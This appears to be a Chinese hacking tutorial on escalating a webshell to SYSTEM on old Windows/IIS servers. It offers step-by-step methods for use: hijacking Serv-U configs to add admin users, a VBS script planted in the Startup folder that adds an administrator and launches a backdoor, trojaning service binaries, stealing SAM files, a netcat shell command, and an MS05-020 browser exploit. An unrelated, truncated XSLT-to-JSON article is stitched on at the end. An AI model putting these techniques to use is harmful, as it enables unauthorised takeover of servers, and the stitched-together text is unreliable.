webshell提权教程.doc

WEB提权常见的方法： 第一 如果服务器上有装了pcanywhere服务端，管理员为了管理方便 也给了我们方便，到系统盘的Documents and Settings/All Us ers/Application Data/Symantec/pcAnywhere/中下载*.cif本地 破解就使用pcanywhere连接就ok了 **************************************************************************** 第二 有很多小黑问我这么把webshell的iis user权限提升 一般服务器的管理都是本机设计完毕然后上传到空间里， 那么就会用到ftp，服务器使用最多的就是servu 那么我们就利用servu来提升权限 通过servu提升权限需要servu安装目录可写～ 好开始把，首先通过webshell访问servu安装文件夹下的ServUDaemon.ini把他下载 下来，然后在本机上安装一个servu把ServUDaemon.ini放到本地安装文件夹下覆盖， 启动servu添加了一个用户，设置为系统管理员，目录C:\，具有可执行权限 然后去servu安装目录里把ServUDaemon.ini更换服务器上的。 用我新建的用户和密码连接～ 好的，还是连上了 ftp ftp>open ip Connected to ip. 220 Serv-U FTP Server v5.0.0.4 for WinSock ready... User (ip:(none)): id //刚才添加的用户 331 User name okay, please send complete E-mail address as password. Password:password //密码 230 User logged in, proceed. ftp> cd winnt //进入win2k的winnt目录 250 Directory changed to /WINNT ftp>cd system32 //进入system32目录 250 Directory changed to /WINNT/system32 ftp>quote site exec net.exe user rover rover1234 /add //利用系统的net.exe 文件加用户。 如果提示没有权限，那我们就 把后门（server.exe） 传他system32目录 然后写一个VBs教本 set wshshell=createobject ("wscript.shell") a=wshshell.run ("cmd.exe /c net user user pass /add",0) b=wshshell.run ("cmd.exe /c net localgroup Administrators user /add",0) b=wshshell.run ("cmd.exe /c server.exe",0) 存为xx.vbe 这个教本的作用是建立user用户密码为pass 并且提升为管理员 然后执行system32目录下的server.exe 把这个教本传他 C:\Documents and Settings\All Users\「开始」菜单\程序\启动 目录 这样管理员只要一登陆就会执行那个教本. 接下来就是等了.等他登陆. 第三 就是先检查有什么系统服务，或者随系统启动自动启动的程序和管理员经常使用的软件， 比如诺顿，VAdministrator，金山，瑞星,WinRAR甚至QQ之类的，是否可以写，如果可以就修改其程序， 绑定一个批处理或者VBS，然后还是等待服务器重启。 **************************************************************************** 第四 查找conn和config ,pass这类型的文件看能否得到sa或者mysql的相关密码，可能会有所 收获等等。 **************************************************************************** 第五 使用Flashfxp也能提升权限，但是成功率就看你自己的运气了 首先找到FlashFXP文件夹，打开(编辑)Sites. dat，这个文件这是什么东西密码和用户名， 而且密码是加了密的。 如果我把这些文件copy回本地也就是我的计算机中，替换我本地的相应文件。然后会发现 打开flashfxp在站点中打开站点管理器一样。又可以添加N多肉鸡啦～～嘻嘻～ 唔？？不对啊，是来提升权限的啊，晕，接着来别半途而废。 大家看看对方管理员的这站点管理器，有用户名和密码，密码是星号的。经过用xp星号密码 查看器查看，然后和Sites.dat中加密了密码做比较发现并未加密而是查到的密码是明文显示， 然后最终把这个网站管理员的密码从这堆东西中找 出来。那么下一步就可以链接这些新的服务器啦～～ 经过测试只要把含有密码和用户名的Sites.dat文件替换到本地相应的文件就可以在本地 还原对方管理员的各个站点的密码。 **************************************************************************** 第六 WIN2K+IIS5.0默认情况下应用程序保护选项是"中（共用的）"，这时IIS加载isapi是用的 iwam_computername用户身份执行。 但默认情况下WIN2K+IIS5对于一些特殊isapi又要以system身份加载。win2k+iis5 、 win2k+iis5+sp1、win2k+iis5+sp2都是简单的判断isapi的文件名，并且没有做目录限制， 以SYSTEM权限加载的isapi有： 1、 idq.dll 2、 httpext.dll 3、 httpodbc.dll 4、 ssinc.dll 5、 msw3prt.dll 6、 author.dll 7、 admin.dll 8、 shtml.dll 9、 sspifilt.dll 10、compfilt.dll 11、pwsdata.dll 12、md5filt.dll 13、fpexedll.dll 所以利用这很容易得到SYSTEM权限。并且判断文件名的时候有个bug，比如请求/scripts/test%81%5cssinc.dll也将会认为是请求的ssinc.dll,就是分离文件路径的时候没有考虑到双字节的 远东版问题。ssinc.dll在处理包含文件路径的时候也有一个问题，就是"/"、"\"只识别了一个 "/"，所以如果请求里面使用"\"，就会错误的处理包含文件路径，有可能泄露东西或者出现权限 漏洞，这种漏洞很多别的地方（ php、asp等）也还存在。 加载这些isapi不是单以文件名做依据了，而是加了路径，应该是修正了此问题。 一般默认情况下是： 1、 idq.dll d:\winnt\system32\idq.dll 2、 httpext.dll d:\winnt\system32\inetsrv\httpext.dll 3、 httpodbc.dll d:\winnt\system32\inetsrv\httpodbc.dll 4、 ssinc.dll d:\winnt\system32\inrtsrv\ssinc.dll 5、 msw3prt.dll d:\winnt\system32\msw3prt.dll 6、 author.dll D:\Program Files\Common Files\Microsoft Shared\web server extensions\40\isapi\_vti_aut\author.dll 7、 admin.dll D:\Program Files\Common Files\Microsoft Shared\web server extensions\40\isapi\_vti_adm\admin.dll 8、 shtml.dll D:\Program Files\Common Files\Microsoft Shared\web server extensions\40\isapi\shtml.dll 9、 sspifilt.dll d:\winnt\system32\inetsrv\sspifilt.dll 10、compfilt.dll d:\winnt\system32\inetsrv\compfilt.dll 11、pwsdata.dll d:\winnt\system32\inetsrv\pwsdata.dll 12、md5filt.dll d:\winnt\system32\inetsrv\md5filt.dll 13、fpexedll.dll D:\Program Files\Common Files\Microsoft Shared\web server extensions\40\bin\fpexedll.dll 正常情况下这些路径都guest不能写,但如果配置不好，这些路径iis user能够写了就一样可以提升权限了 可以把ISAPIHack.dll上传到IIS的可执行目录，文件名可叫ssinc.dll或者admin.dll等（上面列的13个文件名之一）。 然后等待IIS重启加载此dll，就可以获得权限了 **************************************************************************** 第七 下载系统的 %windir%\repair\sam.*（WinNT 4下是sam._ 而Windows 2000下是sam）文件， 然后用L0pht等软件进行破解，只要能拿到，肯花时间，就一定可以破解。 **************************************************************************** 第八 PipeUpAdmin（Windows 2000下）, 在本机运行可以把当前用户帐号加入管理员组。普通用户和Guests组用户都可以成功运行。 **************************************************************************** 第九 Serv-u Ftp Server 本地权限提升漏洞： 很多主机的C:\Documents and Settings\All Users\ Documents目录以及下边几个子目录Documents没有设置权限，导致可以在这个目录上传并运行Exp. 直接上传了serv-u local exploit 和nc, 并且把serv-u的本地提升权限的名字命名为su.exe 文件就放在C:\Documents and Settings\All Users\ Documents, 然后我们用su.exe直接建立用户,也可以反弹一个shell过来的。 具体命令： 建立用户: serv-u.exe "cmd" >USER xl >PASS 111111 反弹shell: serv-u.exe "nc.exe -l -p 99 -e cmd.exe" 很不错的提权新方法 今天我要带给大家的是，当我们得到WEBSHELL后如何得到SYSTEM权限的新方法， 提升权限这个已经是老生常谈了，网络上已经有很多种提升权限的方法了，在这里我就不在提了，今天我给大家介绍的是就是主动利用MS05020漏洞来达到我们提升权限的目的。 MS05020是一个IE漏洞，2005.4份的时候微软就发步了这个公告： 安全漏洞CN-VA05-025 发布日期：2005-04-13 漏洞类型：远程执行代码 漏洞评估：高危 受影响版本： Microsoft Windows 2000 Service Pack 3 和 Microsoft Windows 2000 Service Pack 4 Microsoft Windows XP Service Pack 1 和 Microsoft Windows XP Service Pack 2 Microsoft Windows XP 64-Bit Edition Service Pack 1 (Itanium) Microsoft Windows XP 64-Bit Edition Version 2003 (Itanium) Microsoft Windows Server 2003 Microsoft Windows Server 2003(用于基于 Itanium 的系统)Microsoft Windows 98、Microsoft Windows 98 Second Edition (SE) 和 Microsoft Windows Millennium Edition (ME) 测试过的 Microsoft Windows 组件： 漏洞描述： Internet Explorer 由于其处理某些 DHTML 对象的方式而存在一个远程执行代码漏洞。 攻击者可以通过构建恶意的网页来利用该漏洞。 如果某个用户访问了恶意网站，此恶意网页就可能允许远程执行代码。 成功利用此漏洞的攻击者可以完全控制受影响的系统。Internet Explorer 由于其处理某些 URL 的方式而存在一个远程执行代码漏洞。 攻击者可以通过构建恶意的网页来利用该漏洞。 如果某个用户访问了恶意网站，此恶意网页就可能允许远程执行代码。 成功利用此漏洞的攻击者可以完全控制受影响的系统。Internet Explorer 由于其处理分级审查文件的方法而存在一个远程执行代码漏洞。 攻击者可以通过构造特制的分级审查文件来利用此漏洞。 如果用户访问了恶意网站或查看了恶意的电子邮件，并接受安装此恶意分级审查文件，则该文件可能允许远程执行代码。 成功利用此漏洞的攻击者可以完全控制受影响的系统。 不过，要利用此漏洞，需要进行大量用户交互。 大家看到上面的漏洞描述了吗？当被人浏览的时候才会受到攻击，平时我们利用IE漏洞都是先把有攻击性的页面放到网上，然后等待别人去浏览，这样浏览者就会中招了。 今天我们要提升权限，那自然是让我们要提升权限的主机去浏览存在漏洞的页面了，那当我们得到WEBSHELL后怎么才能让主机去浏览这个页面呢？ Ms05020的EXP网页代码已经出来了，大家可以到： 去下载，假如我们已经把这个EXP放到 下面我们开始利用这个EXP，进入到我们的ASP木马，打开CMDSHELL，如果用不了的，大家自己想办法解决（可以自己上传一个CMD.EXE上去）。 在命令行里输入：start 然后点执行。 这个时候主机的IE就会去访问我们的这个MS05020.HTML，那么如果主机没有打扑钉的话，就会绑定一个28876的断口在主机上。 接着我们输入：netstat -an | find "28876" 看看是否成功绑定，第一次的话，会慢一些，大家要等待一下，我这里很快就成功了。然后我们telnet上去马上就成功了 大家看到了：（我添加了一个temp的管理员） 现在我们已经拿到SYSTEM权限了 ，大家还想干什么不可以？ 后记：其实大家还可以先上传NC，然后连接到本地后，再输入： start 也是可以的。 还有就是如果可以的话还可以这样输入： start "C:\Program Files\Internet Explorer\icxplore.exe" 这个要看你的情况了，一般虚拟主机如果允许访问的话，那还是用第一个命令好了！ 我测试过在2K pro、 2K server(2000 Enterprise Terminal Server) 、2003都成功过！不过也有不成功的时候，而且不成功的概率很大，特别是到虚拟机的时候，有一次我没有成功，然后我开了3389进入，发现IE没有弹出来，而是出来了一个IE设置向导，也就是说这个服务器没有对IE进行网络设置IE是无法访问网络的，艾，其实我现在也没有搞清楚是怎么会事有点能成功有点不行，想也想不通，因为start ist: 总是能成功！ 把XXX。EXE下载到它的电脑上面！我最后认为估计这个还是和MS05020.HTM这个文件有关。艾，看来这个方法的利用价值也很小了，本来不想发出来了的，既然写出来了，还是发表出来一下吧！刚刚和无敌讨论了一下，他也是说不成功的原因估计也是这个，还有就是系统打了IE补丁。附录资料： 从 XML 生成可与 Ajax 共同使用的 JSON 时下，非常流行使用 JavaScript 代码为数据驱动的 Web 应用程序添加互动性。若能将数据编码成 JavaScript Object Notation（JSON）的格式，您就可以更轻松地通过 JavaScript 语言使用它。通过本文，发掘使用 XSLT V2 从 XML 数据生成 JSON 的几种不同方法。 几年前，许多开发人员很看好 XML、XSLT、Extensible HTML （XHTML）和其他一些基于标记的语言。现在，Asynchronous JavaScript and XML（AJAX）成了新的热点，人们又将目光转向了使用 JavaScript 代码的数据驱动的富 Internet 应用程序。但是开发人员是否已经消除了 XML 和这一新技术之间的鸿沟呢？ 当然，您可以在 Web 客户机中使用 XML 解析器来读取数据，但这种做法会带来两个问题。第一，出于安全方面的原因，XML 数据只能从与此页面相同的那个域中读取。这虽然不是什么大的限制因素，但它的确会引起部署方面的问题，还会阻碍 DHTML 小部件的创建。第二，读取和解析 XML 会非常慢。 另一种做法是让服务器执行 XML 的解析工作，方法是设置服务器，使之向浏览器发送以 JavaScript 代码或时下流行的 JavaScript Object Notation（JSON）编码的数据。本文将展示如下三种使用 XSLT V2 语言和 Saxon XSLT V2 处理器从 XML 数据生成 JSON 的技巧： l 简单编码 l 通过函数调用加载数据 l 编码对象 JSON 简介 要学习如何将数据编码成 JSON（它只是 JavaScript 的一个子集），最好的方法是从数据开始。清单 1 显示了书籍列表的一个示例 XML 数据集。 清单 1. 基本的图形化图书馆 <?xml version="1.0" encoding="UTF-8"?> <books> <book id="1"> <title>Code Generation in Action</title> <author><first>Jack</first><last>Herrington</last></author> <publisher>Manning</publisher> </book> <book id="2"> <title>PHP Hacks</title> <author><first>Jack</first><last>Herrington</last></author> <publisher>O'Reilly</publisher> </book> <book id="3"> <title>Podcasting Hacks</title> <author><first>Jack</first><last>Herrington</last></author> <publisher>O'Reilly</publisher> </book> </books> 这个数据集很简单，只包含三本书，每本书都具有惟一的 ID、书名、作者姓名及出版商的名字。（没错，我只选择了我自己的书作为数据集，但能怨我吗？这些书实在是不可多得的节日和生日礼物。） 清单 2 显示了这些数据在 JSON 中的效果。 清单 2. JSON 中的示例数据集 [ { id: 1, title: 'Code Generation in Action', first: 'Jack', last: 'Herrington', publisher: 'Manning' }, ... ] 方括号 ([]) 表明这是一个数组。大括号 ({}) 则表明这是一个散列表，该散列表由一组名称和值对组成。在本例中，我创建了一个散列表的数组 —— 用来存储这类结构式数据的一种常见方法。 另外一点值得注意的是字符串是通过单引号或双引号被编码的。所以，如果我想用单引号编码 O'Reilly，我就必须使用反斜杠对它进行转义：'O\'Reilly'。 这让我编写的这个 XSLT 样式表更为有趣了一些。 我并未在本例中放上任何日期，但您也可以通过如下两种方法来编码日期。第一种方法是将日期作为字符串，该字符串必须在后面被解析。第二种方法是将日期作为一个对象，比如： publishdate: new Date( 2006, 6, 16, 17, 45, 0 ) 这段代码将 publishdate 的值设置为6/16/2006 5:45:00 p.m.。 简单编码 接下来我将陆续介绍 JSON 编码的几种技巧。第一种也是其中最简单的一种，此样式表如 清单 3 所示。 清单 3. simple.xsl 样式表 <?xml version="1.0" encoding="UTF-8"?> <xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="2.0" xmlns:js=""> <xsl:output method="text" /> <xsl:function name="js:escape"> <xsl:param name="text" /> <xsl:value-of select='replace( $text, "'", "\\'" )' /> </xsl:function> <xsl:template match="/"> var g_books = [ <xsl:for-each select="books/book"> <xsl:if test="position() > 1">,</xsl:if> { id: <xsl:value-of select="@id" />, name: '<xsl:value-of select="js:escape(title)" />', first: '<xsl:value-of select="js:escape(author/first)" />', last: '<xsl:value-of select="js:escape(author/last)" />', publisher: '<xsl:value-of select="js:escape( publisher )" />' }</xsl:for-each> ]; </xsl:template> </xsl:stylesheet> 要理解此样式表，不妨先来看一下 清单 4 所示的输出。 清单 4. simple.xsl 的输出 var g_books = [ { id: 1, name: 'Code Generation in Action', first: 'Jack', last: 'Herrington', publisher: 'Manning' }, { id: 2, name: 'PHP Hacks', first: 'Jack', last: 'Herrington', publisher: 'O\'Reilly' }, { id: 3, name: 'Podcasting Hacks', first: 'Jack', last: 'Herrington', publisher: 'O\'Reilly' } ]; 这里，我将名为 g_books 的变量设置为一个包含三个散列表的数组，每个散列表包含关于该书的信息。再回过头来看看 清单 3，您会发现第一个模板匹配 "/" 路径，它也是首先应用到输入数据集的模板，该模板使用 for-each 循环来遍历每本书。之后，它使用 <value-of> 标记来将文本从该数据输出到 JavaScript 输出代码。 对于字符串，我使用名为 js:escape() 的定制函数，它在模板之前定义。该函数使用一个正则表达式将一个单引号标记更改为带有反斜杠的单引号标记。 最后一个重要的元素是 <xsl:output> 标记，它告知处理器要输出的是文本而不是 XML。要检验此过程是否可以正常工作，我加入了一个 simple .html 文件，该文件引用我在 simple.js 保存的 XSL 样式表的输出。这个 HTML 文件如 清单 5 所示。 清单 5. simple.html 文件 <html> <head> <title>Simple JS loader</title> <script src="simple.js"></script> </head> <body> <script> document.write( "Found "+g_books.length+" books" ); </script> </body> </html> .html 文件使用 <script> 标记简单地加载已编码了的 JavaScript 代码。之后，第二个 <script> 标记将数组的长度写出到浏览器页面，如 图 1 所示。 图 1. simple.html 的输出 好了！数据文件包含三本书，相应的 JavaScript 文件也包含三本书。它真的可以工作！ 通过函数加载 上述第一个示例很简单，而且在大多数情况下可以发挥其作用，但它存在一些问题。第一个问题是对于数据何时被加载没有任何提示。如果数据是像页面那样被静态加载的，这不成问题。但是如果页面动态创建了一个 <script> 标记来按需加载数据，那么就很有必要知道 <script> 标记是何时完成的。实现此功能的最好的方法是让编码了的数据调用一个 JavaScript 函数，而不是只设置数据。 这个概念很重要，所以我将花一些时间来介绍一下为什么您必须要通过动态生成的 <script> 标记来加载数据。页面加载后，从服务器获得数据是 Web 2.0 的核心功能。一种方法是使用 AJAX 机制通过到服务器的调用来加载 XML。然而，出于安全性的原因，AJAX 机制只限于从单一域获取数据。这在大多数情况下都没有问题，但有时，您可能需要 JavaScript 代码运行在他人的页面上（例如，Google Maps）。 在这种情况下从服务器获得数据的惟一方法是通过动态加载 <script> 标记。获悉 <script> 标记何时加载的最好的方法是让 <script> 标记返回的脚本调用函数而不是简单地加载数据。清单 6 显示了在函数调用中编码的数据。 清单 6. Function1.js AddBooks( [ { id: 1, name: 'Code Generation in Action', first: 'Jack', last: 'Herrington', publisher: 'Manning' }, { id: 2, name: 'PHP Hacks', first: 'Jack', last: 'Herrington', publisher: 'O\'Reilly' }, { id: 3, name: 'Podcasting Hacks', first: 'Jack', last: 'Herrington', publisher: 'O\'Reilly' } ] ); 清单 7 给出了相应的 .html 文件。 清单 7. Function1.html <html> <head> <title>Function 1 JS loader</title> <script> var g_books = []; function AddBooks( books ) { g_books = books; } </script> <script src="function1.js"></script> <script src="drawbooks.js"></script> </head> <body> <script>drawbooks( g_books );</script> </body> </html> 稍后将详细介绍 drawbooks 函数。这里重要的是了解一下页面如何定义 AddBooks 函数，该函数随后会由 function1.js 文件中的脚本调用。该 AddBooks 函数负责处理数据。而且被调用的 AddBooks 函数会向页面指示 <script> 标记被正确加载，并已加载完成。 要创建 function1.js 文件，我只对样式表稍微做了一点修改，如 清单 8 所示。 清单 8. function1.xsl 样式表 <xsl:template match="/"> AddBooks( [ <xsl:for-each select="books/book"> <xsl:if test="position() > 1">,</xsl:if> { id: <xsl:value-of select="@id" />, name: '<xsl:value-of select="js:escape(title)" />', first: '<xsl:value-of select="js:escape(author/first)" />', last: '<xsl:value-of select="js:escape(author/last)" />', publisher: '<xsl:value-of select="js:escape( publisher )" />' }</xsl:for-each> ] ); </xsl:template> 这里，我调用了一个函数，而不是简单地设置一个变量。这就是我所做的惟一更改。 回到页面，我使用了 drawbooks 函数来构建书的表格，这样我就能够确认数据被正确编码和正确显示。此函数是在 drawbooks.js 内定义的，如 清单 9 所示。 清单 9. Drawbooks.js function drawbooks( books ) { var elTable = document.createElement( 'table' ); for( var b in books ) { var elTR = elTable.insertRow( -1 ); var elTD1 = elTR.insertCell( -1 ); elTD1.appendChild( document.createTextNode( books[b].id ) ); var elTD2 = elTR.insertCell( -1 ); elTD2.appendChild( document.createTextNode( books[b].name ) ); var elTD3 = elTR.insertCell( -1 ); elTD3.appendChild( document.createTextNode( books[b].first ) ); var elTD4 = elTR.insertCell( -1 ); elTD4.appendChild( document.createTextNode( books[b].last ) ); var elTD5 = elTR.insertCell( -1 ); elTD5.appendChild( document.createTextNode( books[b].publisher ) ); } document.body.appendChild( elTable ); } 这个简单函数创建了一个表格节点，然后循环访问书的列表并为每本书创建一行，为每个数据元素分配一个单元格。此页面上的代码的结果如 图 2 所示。 图 2. function1.html 的结果 现在我就可以查看一下此页面的输出并确认来自原始 .xml 文件的一切均已被正确转换成 JavaScript 代码，且数据被发送到 AddData 函数并被正确添加到页面。 细化函数调用技术 我很喜欢函数调用这一技术，但我并不赞同将所有图书数据都放入一个块中。另一种方式是为每条记录采用一个调用，如 清单 10 所示。 清单 10. Function2.js AddBook( { id: 1, name: 'Code Generation in Action', first: 'Jack', last: 'Herrington', publisher: 'Manning' } ); AddBook( { id: 2, name: 'PHP Hacks', first: 'Jack', last: 'Herrington', publisher: 'O\'Reilly' } ); ... 对 .html 页面只需做少许修改，如 清单 11 所示。 清单 11. Function2.html ... <script> var g_books = []; function AddBook( book ) { g_b